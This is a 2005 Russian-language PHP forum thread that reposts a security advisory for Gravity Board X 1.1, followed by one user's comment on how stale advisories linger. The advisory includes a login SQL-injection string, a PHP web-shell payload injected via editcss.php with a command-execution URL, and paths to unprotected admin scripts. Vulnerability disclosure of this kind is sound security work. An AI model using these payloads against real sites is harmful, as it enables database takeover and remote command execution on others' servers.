Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
Программирование. Ступени успешной карьеры. Авторы: Кузнецов М.В., Симдянов И.В. PHP. Практика создания Web-сайтов (второе издание). Авторы: Кузнецов М.В., Симдянов И.В. PHP 5. На примерах. Авторы: Кузнецов М.В., Симдянов И.В., Голышев С.В. MySQL 5. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. MySQL на примерах. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Разное

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум Структурный форум

тема: SQL-инъекция и выполнение произвольных команд в Gravity Board X
 
 автор: Boss   (12.08.2005 в 23:50)   письмо автору
 
 

Программа: Gravity Board X 1.1
Опасность: Высокая

Наличие эксплоита: Да

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольные SQL команды в базе данных приложения, выполнить произвольные PHP команды на системе.

1. SQL-инъекция возможна из-за недостаточной проверки входных данных в параметре 'login'. Удаленный пользователь может послать специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения. Пример:

login: ' or isnull(1/0) /*
password: whatever

2. Удаленный авторизованный администратор может внедрить произвольный HTML сценарий в шаблон и произвести XSS нападение.
3. Уязвимость существует в сценарии 'editcss.php'. Удаленный пользователь может внедрить в шаблон произвольный PHP сценарий и выполнить его во время загрузки страницы с привилегиями web сервера. Пример:

http://[target]/[path]/editcss.php?csscontent=</style>
<?php%2 0system($HTTP_GET_VARS[cmd]);%20?>

Выполнение команд будет возможно с помощью URL:
http://[target]/[path]/index?cmd=[command]

4. Удаленный пользователь может получить данные роб установочной директории приложения, обратившись непосредственно к следующим сценариям:
http://[target]/[path]/deletethread.php?perm=1
http://[target]/[path] /ban.php
http://[target]/[path]/addnews.php
http://[target]/[path]/banned.php
http://[target]/[path]/boardstats.php
http://[target]/[path]/adminform.php
http://[targ et]/[path]/forms/admininfo.php
http://[target]/[path]/forms/announcements.php
http://[target]/[path]/forms/banform.php

URL производителя: www.gravityboardx.com

Решение: Способов устранения уязвимости не существует в настоящее время.


Что скажете насчет этих проблем?
Довольно интересная статья на мой взгляд....

   
 
 автор: cheops   (12.08.2005 в 23:56)   письмо автору
 
   для: Boss   (12.08.2005 в 23:50)
 

По опыту LiteForum скажу, что даже если опасность утстраняется в течении часа фраза "Решение: Способов устранения уязвимости не существует в настоящее время." будет висеть вечно на сайте его разместившем :)))

   
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования